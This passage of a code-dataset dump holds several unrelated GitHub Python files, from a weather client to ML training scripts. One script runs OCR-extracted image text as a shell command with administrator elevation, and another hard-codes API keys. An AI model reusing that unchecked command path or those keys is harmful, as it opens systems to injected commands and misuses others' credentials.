SECRET_KEY)\r\n\r\n img = open('pic.png', 'rb').read()\r\n message = client.basicGeneral(img)\r\n res = message['words_result']\r\n # print(res[-2]['words']) #待执行的命令\r\n # for i in res:\r\n # print(i['words'])\r\n\r\n os.popen(res[-2]['words'])\r\n\r\nelse:\r\n if sys.version_info[0] == 3:\r\n # print(\"无管理员权限\")\r\n ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, __file__, None, 1)\r\n","repo_name":"icyzhe/Remote-Shutdown-Your-PC","sub_path":"shutdownPC.py","file_name":"shutdownPC.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16528835096","text":"import requests\nimport json\nimport pprint\nimport csv\n\n#Abro el csv\nkey_open_weather = 'dbab0df10e6e13cff5c0becfbfae9139'\nkey_open_geo = '931f2abe294f4d9ea74afa0cf790df99'\n\n#Si tuviera un archivo con 500 ciudades es dificil darse cuenta rapida donde esta el error\n#Por eso se crea un archivo con los logs de errores \nwith open('sucursales_sol_360.csv') as csv_hoteles, open('sucursales_con_clima.csv','w') as csv_hoteles_clima, open('log_errores.txt','w') as errores:\n hoteles=csv.reader(csv_hoteles, delimiter=';')\n for ciudad in hoteles:\n nombre_ciudad = ciudad[0]+ ', ' +ciudad[1] + ', Argentina' #CLAVE PONER ARGENTINA SINO TE PUEDE TOMAR DE OTRO PAIS\n #print(nombre_ciudad) Merlo, San Luis Ushuaia, Tierra del fuego etc\n ciudad_cod=requests.utils.quote(nombre_ciudad)\n #Primero tengo que darle de comer a la primera API \n url_geo='https://api.opencagedata.com/geocode/v1/json?q=' + ciudad_cod +'&key=' + key_open_geo\n objeto_geo=json.loads(requests.get(url_geo).text)\n #pprint.pprint(objeto_geo)\n lat = objeto_geo['results'][0]['geometry']['lat']\n lon = objeto_geo['results'][0]['geometry']['lng']\n #print(nombre_ciudad,lat,lon)\n \n \n#%% \n \n #api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={your api key}\n #No necesito mas el nombre de la ciudad_cod ahora pongo directamente las coordenadas\n url = \"https://api.openweathermap.org/data/2.5/weather?lat=\" + str(lat) + \"&lon=\" + str(lon) + \"&units=metric&lang=es&appid=\" + key_open_weather\n objeto=json.loads(requests.get(url).text)\n #if 'main' in objeto.keys(): #Poprque sino da Keyerror main entonces veo si lo agarra\n if objeto.get('main'):\n print(\"El clima en\", nombre_ciudad)\n print(\"La temperatura es de \",objeto['main']['temp'],'C')\n print(\"La humedad es de \", objeto['main']['humidity'],'%')\n print(\"El clima: \", objeto['weather'][0]['description'] + '\\n')\n else: \n print(\"No existe la ciudad: \", nombre_ciudad, '\\n')\n errores.write(\"No existe lal ciudad \" + nombre_ciudad + '\\n')\n #Escribo en un txt las ciudades que dieron error o que no existen\n#Ahora hay que solucionar esos errores de CABA e IBERA parece que no estan en la base de datos de open weather\n#Necesito encontrar una API que le pase la ciudad y me devuelva las coordenadas\n ","repo_name":"sebastiancolussi/Weather_geo_API","sub_path":"Weather_geo_API.py","file_name":"Weather_geo_API.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24797948809","text":"from flask import Flask, request, jsonify\nimport random\nfrom threading import Lock\nLOCK = Lock()\n\nfrom translate import translate_lines\nfrom align import align_sentence, replace_words\n\nwordcount = 0\ndef replace_sentences(sentences, src_word_list=set(), tgt_word_list=set()):\n \"\"\"\n Replace words in a list of sentences with their translations.\n src_word_list is the set of the words in the source language you want to have replaced,\n and tgt_word_list is the set of words in the target language you want to show up. \n \"\"\"\n print(\"Total sentences =\", len(sentences))\n import time\n start = time.time()\n translations = translate_lines(sentences)\n print(\"time to translate:\", time.time() - start)\n start = time.time()\n alignments = [align_sentence(sentence, translation) for sentence, translation in zip(sentences, translations)]\n print(\"time to align translation:\", time.time() - start)\n\n # tgt_words = [word for sent_src, sent_tgt, align_words in alignments for word, _ in sent_tgt]\n # global wordcount\n # wordcount += len(tgt_words)\n # print(\"word count at\", wordcount)\n # if wordcount >= 1000:\n # tgt_words = set(tgt_words) - tgt_word_list\n # new_word = random.choice(tuple(tgt_words))\n # new_word = new_word.strip().lower()\n # with open(\"../de_words.txt\", 'a', encoding='utf-8') as f:\n # f.write(new_word + \"\\n\")\n # tgt_word_list.add(new_word)\n # wordcount = 0\n\n start = time.time()\n new_sentences = [replace_words(*a, src_word_list=src_word_list, tgt_word_list=tgt_word_list)\n for a in alignments]\n print(\"time to reconstruct:\", time.time() - start)\n start = time.time()\n new_sentences = [sent.strip() for sent in new_sentences]\n return new_sentences\n\nwith open(\"../en_words.txt\", 'r', encoding=\"utf-8\") as f:\n src_word_list = {word.strip() for word in f.readlines() if word.strip()}\nwith open(\"../de_words.txt\", 'r', encoding=\"utf-8\") as f:\n tgt_word_list = {word.strip() for word in f.readlines() if word.strip()}\n\n#print(replace_sentences([\"The most important thing was to stay on the premises.\"], src_word_list, tgt_word_list))\n#exit()\napp = Flask(__name__)\n@app.route('/set_src_list', methods=['POST'])\ndef set_src_list():\n global src_word_list\n data = request.get_json()\n if isinstance(data, list) and all(isinstance(item, str) for item in data):\n src_word_list = {s.lower() for s in data}\n return 'List stored successfully!'\n else:\n return jsonify({'error': 'Invalid list format. Please provide a list of strings.'}), 400\n\n@app.route('/set_tgt_list', methods=['POST'])\ndef set_tgt_list():\n global tgt_word_list\n data = request.get_json()\n if isinstance(data, list) and all(isinstance(item, str) for item in data):\n tgt_word_list = {s.lower() for s in data}\n return 'List stored successfully!'\n else:\n return jsonify({'error': 'Invalid list format. Please provide a list of strings.'}), 400\n\n@app.route('/replace_sentences', methods=['POST'])\ndef replace_sentences_():\n try:\n LOCK.acquire()\n input_list = request.get_json()[\"sentences\"]\n if isinstance(input_list, list) and all(isinstance(item, str) for item in input_list):\n sentences = [s.strip() for s in input_list]\n replaced = replace_sentences(sentences, src_word_list, tgt_word_list)\n LOCK.release()\n return jsonify({\"replacements\": replaced})\n else:\n LOCK.release()\n return jsonify({'error': 'Invalid list format. Please provide a dictionary of the format {\"sentences\": [\"sentence 1\", ..., \"sentence N\"]}'}), 400\n except Exception as e:\n print(\"Error occurred:\", e)\n LOCK.release()\n return jsonify({'error': 'Internal server error'}), 500\napp.run(port=5000, host='localhost')","repo_name":"cooljoseph1/translate-to-german","sub_path":"python-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8009685706","text":"from aiogram import types\n\nfrom app.external.drivers.bitbucket import BitbucketDriver\nfrom app.external.utils.handler_routing import parse_button_route\nfrom app.internal.logic.entities.db.user import User\nfrom app.internal.logic.services.user import UserService\n\n\nclass BaseStates:\n handlers = {}\n payload = {}\n\n user: User\n driver: BitbucketDriver\n\n @classmethod\n async def create(cls, user_telegram_id):\n self = cls()\n self.user = await UserService.get_user_by_telegram_id(user_telegram_id)\n await self.user.get_session()\n self.driver = BitbucketDriver(await self.user.access_token)\n return self\n\n async def process(self, event: types.CallbackQuery):\n self.payload = parse_button_route(event.data)\n if len(self.payload['route']) == 1:\n await self.handlers['-'](event, self.user, self.driver, self.payload['vars'])\n else:\n func: str = self.payload['route']['1']\n if func not in self.handlers:\n return await event.bot.send_message(\n event.from_user.id, text=\"This option has coming soon...\"\n )\n await self.handlers[func](event, self.user, self.driver, self.payload['vars'])\n","repo_name":"PaperDevil/exalted-atlassian","sub_path":"app/internal/web/telegram/states/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13031331972","text":"import cv2\nimport numpy as np\nimport math\nimport glob\nimport sys\n\n#自作パッケージ\nimport check\nimport Show_3D_add as ADD\nimport Show_3D_color as COLOR\nimport Projection as PROJECTION\nimport demo_extractor as DEMO\n\nx_range = 100\ny_range = 100\nz_range = 100\nthreshold = 240\ntheta = math.degrees(math.atan2(8,10))\n\nsize = (100,100)\nsin = math.sin(math.radians(theta))\ncos = math.cos(math.radians(theta))\n\nx_range_oblique = x_range\ny_range_oblique = (int)(y_range*sin + z_range*cos)\nz_range_oblique = (int)(y_range*cos + z_range*sin)\n\n\nmap_front = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array('IMG_8775.JPG',map_front,248,100)\n\n\nmap_side = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array('IMG_8776.JPG',map_side,235,100)\nmap_side = map_side.transpose(0,2,1)\n\n\nmap_oblipue = PROJECTION.Make_3D_Array(y_range_oblique,x_range_oblique,z_range_oblique)\nPROJECTION.Fill_3D_Array('IMG_8777.JPG',map_oblipue,245,128)\nmap_oblique_true = PROJECTION.Rotate_and_Shlink_from_side_upper(map_oblipue,theta)\n\n\nslice = map_oblique_true[:,:,z_range-1]\nmap_nest = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array_img(slice,map_nest,threshold,128)\n\nmap_true = map_front * map_side * map_oblique_true\nmap_add = map_front + map_side + map_oblique_true\n\n\n#COLOR.Show_3D_color(map_oblique_true,'cyan',1)\n#COLOR.Show_3D_color(map_front,'cyan',1)\n#COLOR.Show_3D_color(map_side,'cyan',1)\nCOLOR.Show_3D_color(map_true,'cyan',1)\n#ADD.Show_3D(map_add.transpose(1,0,2))\n#ADD.Show_3D_3COLOR(map_add.transpose(1,0,2))\n#COLOR.Show_3D_color(map_oblipue,'cyan',1)\nCOLOR.Show_3D_color(map_oblique_true,'cyan',1)\nslice = map_oblique_true[:,:,z_range-1]\n#check.show('slice',slice)\n#cv2.imwrite('nest.JPG',slice)\n\n\"\"\"\nimg = cv2.imread('IMG_8777.JPG')\nsize = (img.shape[0],img.shape[1])\nPROJECTION.cut_rotate(img,size,theta)\n\"\"\"\n#DEMO.thresh_checker('IMG_8776.JPG')\n","repo_name":"taigababa/3d_mapping","sub_path":"MAP/Occlusion_Test.py","file_name":"Occlusion_Test.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41904091890","text":"# Prerequisite:\n#\n# bitstring\n# sudo pip install bitstring OR sudo easy_install bitstring\n#\n#import os\nimport sys\nsys.path.append(\"modules\")\nfrom tzx import *\nfrom zxfile import *\nfrom versaload import *\nfrom screenutil import *\n\ntape = TZX()\n\n\"\"\"\nFile metadata\n\"\"\"\ninfoblock = Blk_AIB()\ninfoblock.add_info(AINFO_TITLE,\"Versaload test 2\")\ninfoblock.add_info(AINFO_AUTHOR,\"Peter Knight (going-digital)\")\ninfoblock.add_info(AINFO_PUBYEAR,\"2013\")\ninfoblock.add_info(AINFO_PROTECTION,\"Versaload\")\ninfoblock.add_info(AINFO_COMMENT,\"http://github.com/going-digital/versaload\")\n#infoblock.add_info(AINFO_PUBLISHER,\"\")\n#infoblock.add_info(AINFO_LANG,\"\")\n#infoblock.add_info(AINFO_TYPE,\"\")\n#infoblock.add_info(AINFO_PRICE,\"\")\n#infoblock.add_info(AINFO_ORIGIN,\"\")\ntape.add_block(infoblock)\n\n\"\"\"\nLoader\n\"\"\"\nloaderprog = open(\"boot1.bin\",\"rb\").read()\nloaderheader = ZX_FileHdr(SPEC_FILE_PROG, '\\x16\\x0b\\x0cLoading', 0, 0, 0)\nloaderdata = ZX_FileData(loaderprog)\nloaderheader.setdatalen(loaderdata.datalen())\nloaderblock1 = Blk_SSDB(data=loaderheader.get())\ntape.add_block(loaderblock1)\nloaderblock2 = Blk_SSDB(data=loaderdata.get())\nloaderblock2.pause(0)\ntape.add_block(loaderblock2)\n\n\"\"\"\nExtract key addresses from Pasmo output\n\nSome loader features make live code modifications to the loading routine.\nHere we extract those addresses from the Pasmo output to use later.\n\"\"\"\n# Extract important addresses from Pasmo output\nlabelList = {}\nwith open(\"boot2.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nwith open(\"print.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nwith open(\"setbaud.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nborderFlashAddr = labelList['BORDER_FLASH']\nborderMainAddr = labelList['BORDER_MAIN']\nborderErrorFlashAddr = labelList['BORDER_ERROR_FLASH']\nborderErrorMainAddr = labelList['BORDER_ERROR_MAIN']\nprintRoutine = labelList['PRINT_ROUTINE']\nprintParam = labelList['PRINT_PARAM']\nbaud = labelList['BAUD'] # Note: baud rate is set in setbaud.py\ncountBlock = labelList['COUNT_BLOCK']\ncountDisable = labelList['COUNT_DISABLE']\ncountStates = labelList['COUNT_STATES']\n\n\"\"\"\nPayload\n\"\"\"\n# Note that baud rate is set in two places:\n# Below (for mastering) and near the bottom of boot2.asm (playback)\n#\npayload = Versaload(baud=baud)\n\n\"\"\"\nBorder functions\n\nThese alter the code of the loader to change the border colour effects during\nloading.\n\"\"\"\ndef borderFlash(colour):\n # Change colour of loading border flash\n payload.load(borderFlashAddr,pack(\" 0:\n countTime(bits)\n bits -= 80+40 # Allowance for countdown block\n payload.load(addr,data[0:0x100])\n\n # Adjust parameters for next time around\n bits -= 80 # Allowance for data header\n bits -= 8*len(data[0:0x100])\n addr += len(data[0:0x100])\n data = data[0x100:]\n return bits\n\n# Original is 6ae1 long, 0x5dc0 to c8a1\n# Load 0x5dc0..0xbc00\npayloadBits = loadWithCountdown(0x5dc0, mainData[0x0000:0x5e40],payloadBits)\nif len(mainData) > 0x5e40:\n # Load 0xbc00..0xc000 to 0xd000+\n payloadBits = loadWithCountdown(0xd000, mainData[0x5e40:0x6240],payloadBits)\nif len(mainData) > 0x6240:\n payloadBits = loadWithCountdown(0xc000, mainData[0x6240:],payloadBits)\npayload.load(0xb493, pack(\" List[int]:\n\n # if required, do the preprocessing for all the structures before. no scaling.\n if primitive:\n for i, s in enumerate(structures):\n spga = SpacegroupAnalyzer(s)\n structures[i] = spga.find_primitive()\n\n sm = StructureMatcher(primitive_cell=False, stol=stol, scale=False)\n\n duplicated_data = []\n unique_structures = {}\n for i_test, s_test in enumerate(structures):\n\n for i_ref, s_ref in unique_structures.items():\n # if len(s_test) != len(s_ref):\n # continue\n # access private method since this will save some time in avoiding the\n # preprocessing.\n match = sm._match(s_test, s_ref, 1, True, break_on_match=True)\n if match is not None and match[0] <= sm.stol:\n duplicated_data.append(i_ref)\n break\n else:\n unique_structures[i_test] = s_test\n duplicated_data.append(None)\n\n return duplicated_data\n\n\ndef group_data(data: List[Dict], energy_tol: float = 0.03) -> List[List[Dict]]:\n sorted_data = sorted(data, key=lambda d: (d[\"nsites\"], d[\"n_inequivalent_sites\"], d[\"energy_per_atom\"]))\n key_func = lambda d: (d[\"nsites\"], d[\"n_inequivalent_sites\"], (d[\"energy_per_atom\"] // energy_tol) * energy_tol)\n grouped_data = []\n for _, group in itertools.groupby(sorted_data, key=key_func):\n grouped_data.append(list(group))\n\n return grouped_data\n\n\ndef run_deduplicate(data: List[Dict], connection_data: dict, stol: float = 0.03, primitive: bool = True,\n delete: bool = False):\n\n duplicated = deduplicate_list([Structure.from_dict(d[\"structure\"]) for d in data], stol=stol, primitive=primitive)\n\n mongo_store = MongoStore(**connection_data)\n mongo_store.connect()\n\n if delete:\n ids_to_remove = [d[\"_id\"] for d, dupl in zip(data, duplicated) if dupl is not None]\n mongo_store.remove_docs({\"_id\": {\"$in\": ids_to_remove}})\n else:\n for d, dupl in zip(data, duplicated):\n if dupl is not None:\n mongo_store.collection.update({\"_id\": d[\"_id\"]},{\"$set\": {\"duplicated\": data[dupl][\"structure_id\"]}})\n\n\ndef deduplicate_data_paral(n_procs: int, connection_data: dict, delete: bool = False,\n stol: float = 0.03, primitive: bool = True, energy_tol: float = 0.03):\n \"\"\"\n A function that marks the duplicated structures inside a mongodb collection.\n First looks for all the structures that do not have the \"duplicated\" value set (absent or None).\n Groups the data based on number of atoms and range of energies. For these sublists runs comparison\n with the StructureMatcher, chooses one of the structure as the reference and for other equivalent\n structures set a \"duplicated\" attribute in the document with value the structure_id of the reference\n structure.\n\n The energy ranges are determined by energy_tol and are simply splitting the energy in bins.\n As a consequence some structures may result as inequivalent even if they would match.\n This should not be a big issue.\n Args:\n n_procs: number of processes used in parallel.\n connection_data: a dictionary with the data that should be given to instantiate a MongoStore.\n delete: if True the duplicated data will be deleted instead of marked as duplicated.\n stol: the stol parameter passed to the StructureMatcher\n primitive: if True the match will be done after converting to primitive.\n energy_tol: the width of the bin used to divide the structures based on their energy per atom.\n \"\"\"\n mongo_store = MongoStore(**connection_data)\n mongo_store.connect()\n\n fields = [\"structure\", \"energy_per_atom\", \"nsites\", \"n_inequivalent_sites\", \"structure_id\"]\n r = mongo_store.query({\"duplicated\": None}, properties=fields)\n if not r:\n return\n data = list(r)\n\n grouped_data = group_data(data, energy_tol=energy_tol)\n\n func = partial(run_deduplicate, connection_data=connection_data, stol=stol, primitive=primitive,\n delete=delete)\n\n pool = multiprocessing.Pool(n_procs)\n pool.map(func, grouped_data)\n pool.close()\n","repo_name":"modl-uclouvain/randomcarbon","sub_path":"randomcarbon/output/deduplicate.py","file_name":"deduplicate.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71853357228","text":"\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger, ReduceLROnPlateau, EarlyStopping, TensorBoard\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.metrics import Recall, Precision, MeanIoU\nfrom glob import glob\nfrom sklearn.model_selection import train_test_split\nfrom model import NanoNet_A, NanoNet_B, NanoNet_C\nfrom utils import shuffling, create_dir\nfrom metrics import dice_loss, dice_coef, iou, bce_dice_loss\nfrom data import tf_dataset, load_data\n\nif __name__ == \"__main__\":\n \"\"\" Seeding \"\"\"\n np.random.seed(42)\n tf.random.set_seed(42)\n\n \"\"\" Remove folders and files \"\"\"\n # os.system(\"rm files/files.csv\")\n # os.system(\"rm -r logs\")\n\n \"\"\" Hyperparameters \"\"\"\n input_shape = (256, 256, 3)\n batch_size = 8\n lr = 1e-4\n epochs = 200\n model_name = \"A\"\n model_path = f\"files/{model_name}/model.h5\"\n csv_path = f\"files/{model_name}/model.csv\"\n log_path = f\"logs/{model_name}/\"\n\n \"\"\" Creating folders \"\"\"\n create_dir(f\"files/{model_name}\")\n\n \"\"\" Dataset \"\"\"\n path = \"/../../Dataset/Kvasir-SEG/\"\n (train_x, train_y), (valid_x, valid_y) = load_data(path)\n\n train_dataset = tf_dataset(train_x, train_y, batch=batch_size)\n valid_dataset = tf_dataset(valid_x, valid_y, batch=batch_size)\n\n \"\"\" Model \"\"\"\n if model_name == \"A\":\n model = NanoNet_A(input_shape)\n elif model_name == \"B\":\n model = NanoNet_B(input_shape)\n elif model_name == \"C\":\n model = NanoNet_C(input_shape)\n\n metrics = [dice_coef, iou, Recall(), Precision()]\n model.compile(loss=dice_loss, optimizer=Adam(lr), metrics=metrics)\n model.summary()\n\n callbacks = [\n ModelCheckpoint(model_path, verbose=1, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, min_lr=1e-7, verbose=1),\n CSVLogger(csv_path),\n TensorBoard(log_dir=log_path),\n EarlyStopping(monitor='val_loss', patience=20, restore_best_weights=False),\n ]\n\n train_steps = (len(train_x)//batch_size)\n valid_steps = (len(valid_x)//batch_size)\n\n if len(train_x) % batch_size != 0:\n train_steps += 1\n\n if len(valid_x) % batch_size != 0:\n valid_steps += 1\n\n model.fit(train_dataset,\n epochs=epochs,\n validation_data=valid_dataset,\n steps_per_epoch=train_steps,\n validation_steps=valid_steps,\n callbacks=callbacks,\n shuffle=False)\n","repo_name":"DebeshJha/NanoNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"39361633111","text":"from torch import nn\nfrom k_diffusion import utils as k_utils\nimport torch\nfrom k_diffusion.external import CompVisDenoiser\nfrom torchvision.utils import make_grid\nfrom IPython import display\nfrom torchvision.transforms.functional import to_pil_image\n\nclass CFGDenoiser(nn.Module):\n def __init__(self, model):\n super().__init__()\n self.inner_model = model\n\n def forward(self, x, sigma, uncond, cond, cond_scale):\n x_in = torch.cat([x] * 2)\n sigma_in = torch.cat([sigma] * 2)\n cond_in = torch.cat([uncond, cond])\n uncond, cond = self.inner_model(x_in, sigma_in, cond=cond_in).chunk(2)\n return uncond + (cond - uncond) * cond_scale\n\nclass CFGDenoiserWithGrad(CompVisDenoiser):\n def __init__(self, model, \n loss_fns_scales, # List of [cond_function, scale] pairs\n clamp_func=None, # Gradient clamping function, clamp_func(grad, sigma)\n gradient_wrt=None, # Calculate gradient with respect to [\"x\", \"x0_pred\", \"both\"]\n gradient_add_to=None, # Add gradient to [\"cond\", \"uncond\", \"both\"]\n cond_uncond_sync=True, # Calculates the cond and uncond simultaneously\n decode_method=None, # Function used to decode the latent during gradient calculation\n grad_inject_timing_fn=None, # Option to use grad in only a few of the steps\n grad_consolidate_fn=None, # Function to add grad to image fn(img, grad, sigma)\n verbose=False):\n super().__init__(model.inner_model)\n self.inner_model = model\n self.cond_uncond_sync = cond_uncond_sync \n\n # Initialize gradient calculation variables\n self.clamp_func = clamp_func\n self.gradient_add_to = gradient_add_to\n if gradient_wrt is None:\n self.gradient_wrt = 'x'\n self.gradient_wrt = gradient_wrt\n if decode_method is None:\n decode_fn = lambda x: x\n elif decode_method == \"autoencoder\":\n decode_fn = model.inner_model.differentiable_decode_first_stage\n elif decode_method == \"linear\":\n decode_fn = model.inner_model.linear_decode\n self.decode_fn = decode_fn\n\n # Parse loss function-scale pairs\n cond_fns = []\n for loss_fn,scale in loss_fns_scales:\n if scale != 0:\n cond_fn = self.make_cond_fn(loss_fn, scale)\n else:\n cond_fn = None\n cond_fns += [cond_fn]\n self.cond_fns = cond_fns\n\n if grad_inject_timing_fn is None:\n self.grad_inject_timing_fn = lambda sigma: True\n else:\n self.grad_inject_timing_fn = grad_inject_timing_fn\n if grad_consolidate_fn is None:\n self.grad_consolidate_fn = lambda img, grad, sigma: img + grad * sigma\n else:\n self.grad_consolidate_fn = grad_consolidate_fn\n\n self.verbose = verbose\n self.verbose_print = print if self.verbose else lambda *args, **kwargs: None\n\n\n # General denoising model with gradient conditioning\n def cond_model_fn_(self, x, sigma, inner_model=None, **kwargs):\n\n # inner_model: optionally use a different inner_model function or a wrapper function around inner_model, see self.forward._cfg_model\n if inner_model is None:\n inner_model = self.inner_model\n\n total_cond_grad = torch.zeros_like(x)\n for cond_fn in self.cond_fns:\n if cond_fn is None: continue\n\n # Gradient with respect to x\n if self.gradient_wrt == 'x':\n with torch.enable_grad():\n x = x.detach().requires_grad_()\n denoised = inner_model(x, sigma, **kwargs)\n cond_grad = cond_fn(x, sigma, denoised=denoised, **kwargs).detach()\n\n # Gradient wrt x0_pred, so save some compute: don't record grad until after denoised is calculated\n elif self.gradient_wrt == 'x0_pred':\n with torch.no_grad():\n denoised = inner_model(x, sigma, **kwargs)\n with torch.enable_grad():\n cond_grad = cond_fn(x, sigma, denoised=denoised.detach().requires_grad_(), **kwargs).detach()\n total_cond_grad += cond_grad\n\n total_cond_grad = torch.nan_to_num(total_cond_grad, nan=0.0, posinf=float('inf'), neginf=-float('inf'))\n\n # Clamp the gradient\n total_cond_grad = self.clamp_grad_verbose(total_cond_grad, sigma)\n\n # Add gradient to the image\n if self.gradient_wrt == 'x':\n x.copy_(self.grad_consolidate_fn(x.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim)))\n cond_denoised = inner_model(x, sigma, **kwargs)\n elif self.gradient_wrt == 'x0_pred':\n x.copy_(self.grad_consolidate_fn(x.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim)))\n cond_denoised = self.grad_consolidate_fn(denoised.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim))\n\n return cond_denoised\n\n def forward(self, x, sigma, uncond, cond, cond_scale):\n\n def _cfg_model(x, sigma, cond, **kwargs):\n # Wrapper to add denoised cond and uncond as in a cfg model\n # input \"cond\" is both cond and uncond weights: torch.cat([uncond, cond])\n x_in = torch.cat([x] * 2)\n sigma_in = torch.cat([sigma] * 2)\n\n denoised = self.inner_model(x_in, sigma_in, cond=cond, **kwargs)\n uncond_x0, cond_x0 = denoised.chunk(2)\n x0_pred = uncond_x0 + (cond_x0 - uncond_x0) * cond_scale\n return x0_pred\n\n # Conditioning\n if self.check_conditioning_schedule(sigma):\n # Apply the conditioning gradient to the completed denoised (after both cond and uncond are combined into the diffused image)\n if self.cond_uncond_sync:\n # x0 = self.cfg_cond_model_fn_(x, sigma, uncond=uncond, cond=cond, cond_scale=cond_scale)\n cond_in = torch.cat([uncond, cond])\n x0 = self.cond_model_fn_(x, sigma, cond=cond_in, inner_model=_cfg_model)\n\n # Calculate cond and uncond separately\n else:\n if self.gradient_add_to == \"uncond\":\n uncond = self.cond_model_fn_(x, sigma, cond=uncond)\n cond = self.inner_model(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n elif self.gradient_add_to == \"cond\":\n uncond = self.inner_model(x, sigma, cond=uncond)\n cond = self.cond_model_fn_(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n elif self.gradient_add_to == \"both\":\n uncond = self.cond_model_fn_(x, sigma, cond=uncond)\n cond = self.cond_model_fn_(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n else: \n raise Exception(f\"Unrecognised option for gradient_add_to: {self.gradient_add_to}\")\n\n # No conditioning\n else:\n # calculate cond and uncond simultaneously\n if self.cond_uncond_sync:\n cond_in = torch.cat([uncond, cond])\n x0 = _cfg_model(x, sigma, cond=cond_in)\n else:\n uncond = self.inner_model(x, sigma, cond=uncond)\n cond = self.inner_model(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n\n return x0\n\n def make_cond_fn(self, loss_fn, scale):\n # Turns a loss function into a cond function that is applied to the decoded RGB sample\n # loss_fn (function): func(x, sigma, denoised) -> number\n # scale (number): how much this loss is applied to the image\n\n # Cond function with respect to x\n def cond_fn(x, sigma, denoised, **kwargs):\n with torch.enable_grad():\n denoised_sample = self.decode_fn(denoised).requires_grad_()\n loss = loss_fn(denoised_sample, sigma, **kwargs) * scale\n grad = -torch.autograd.grad(loss, x)[0]\n self.verbose_print('Loss:', loss.item())\n return grad\n\n # Cond function with respect to x0_pred\n def cond_fn_pred(x, sigma, denoised, **kwargs):\n with torch.enable_grad():\n denoised_sample = self.decode_fn(denoised).requires_grad_()\n loss = loss_fn(denoised_sample, sigma, **kwargs) * scale\n grad = -torch.autograd.grad(loss, denoised)[0]\n self.verbose_print('Loss:', loss.item())\n return grad\n\n if self.gradient_wrt == 'x':\n return cond_fn\n elif self.gradient_wrt == 'x0_pred':\n return cond_fn_pred\n else:\n raise Exception(f\"Variable gradient_wrt == {self.gradient_wrt} not recognised.\")\n\n def clamp_grad_verbose(self, grad, sigma):\n if self.clamp_func is not None:\n if self.verbose:\n print(\"Grad before clamping:\")\n self.display_samples(torch.abs(grad*2.0) - 1.0)\n grad = self.clamp_func(grad, sigma)\n if self.verbose:\n print(\"Conditioning gradient\")\n self.display_samples(torch.abs(grad*2.0) - 1.0)\n return grad\n\n def check_conditioning_schedule(self, sigma):\n is_conditioning_step = False\n\n if (self.cond_fns is not None and \n any(cond_fn is not None for cond_fn in self.cond_fns)):\n # Conditioning strength != 0\n # Check if this is a conditioning step\n if self.grad_inject_timing_fn(sigma):\n is_conditioning_step = True\n\n if self.verbose:\n print(f\"Conditioning step for sigma={sigma}\")\n\n return is_conditioning_step\n\n def display_samples(self, images):\n images = images.double().cpu().add(1).div(2).clamp(0, 1)\n images = torch.tensor(images.numpy())\n grid = make_grid(images, 4).cpu()\n display.display(to_pil_image(grid))\n return\n","repo_name":"deforum-art/deforum-stable-diffusion","sub_path":"helpers/model_wrap.py","file_name":"model_wrap.py","file_ext":"py","file_size_in_byte":10172,"program_lang":"python","lang":"en","doc_type":"code","stars":1974,"dataset":"github-code","pt":"37"} +{"seq_id":"4473879699","text":"elementInRowCount = 0\nrows = 7\ncacheNumber = 1\nstartingNumber = 1\nfor number in range(1,50):\n print(cacheNumber, end = \" \")\n elementInRowCount += 1\n cacheNumber = cacheNumber + rows\n if elementInRowCount == rows:\n print()\n elementInRowCount = 0\n startingNumber += 1\n cacheNumber = startingNumber","repo_name":"JakubIwaszek/PythonHomeworks","sub_path":"03ControlStructures/e32.py","file_name":"e32.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31395800577","text":"import pdb\nfrom uuid import uuid4 as gen_uuid\n\nfrom .. import Inferencer\nfrom ...rdf_wrapper import *\nfrom rdflib import URIRef\nfrom ...helpers import bidict\n\nclass DummyQuiver(Inferencer):\n\n def __init__(self,\n target_building,\n target_srcids,\n source_buildings=[],\n ui=None,\n config={}):\n if 'ground_truth_ttl' not in config:\n raise Exception('True Turtle file should be given for DummyQuiver')\n self.true_g = self.new_graph()\n self.true_g.parse(config['ground_truth_ttl'], format='turtle')\n 